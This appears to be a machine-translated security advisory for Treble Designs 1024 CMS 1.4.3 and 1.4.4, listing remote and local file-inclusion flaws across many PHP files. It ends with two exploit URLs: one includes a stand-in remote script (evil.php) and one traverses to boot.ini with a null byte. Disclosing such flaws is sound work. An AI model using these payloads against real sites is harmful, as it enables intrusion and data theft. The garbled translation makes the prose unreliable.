Issues the date: 2008-07-04
Renewal date: 2008-07-08
Is affected the system:
Treble Designs 1024 CMS 1.4.4 RFC
Treble Designs 1024 CMS 1.4.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30091
1024 are based on PHP and the MySQL content management system management system.
In 1024 CMS has many documents to contain the crack, the permission evil intention user revelation sensitive information or the invasion has crack's system.
1) themes/blog/layouts/standard.php, themes/default/layouts/standard.php, themes/portfolio/layouts/standard.php and in the themes/snazzy/layouts/standard.php document has not confirmed correctly to the page_include parameter input then uses in the included file, this possibly causes to contain local or the exterior resources random document. The success attack request has opened register_globals.
2) the many document correct confirmations then have not used in the included file to each kind of parameter's input, this possibly causes to contain the local resources the random document. The success attack request has been forbid magic_quotes_gpc. The following is the parameter which and the document affects.
theme_dir and page parameter:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php
lang parameter:
admin/lang/fr/reports/default.php
lang/en/moderator/default.php
lang/fr/moderator/default.php
lang/de/moderator/default.php
admin_theme_dir parameter:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
theme_dir parameter:
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php
page, page_include and theme_dir parameter:
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php
<* origin: Digital Security
Link: http://marc.info/?l=bugtraq&m=121519055217560&w=2
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!
http://www.example.com/ [installdir]/themes/blog/layouts/standard.php? page_include= http://www.example.com/evil.php
http://www.example.com/ [installdir]/themes/default/layouts/standard.php? theme_dir=. /. /. /. /. /. /. /. /. /. /. /. /. /boot.ini%00
Other pages: : 1 * 2 * Next>>
|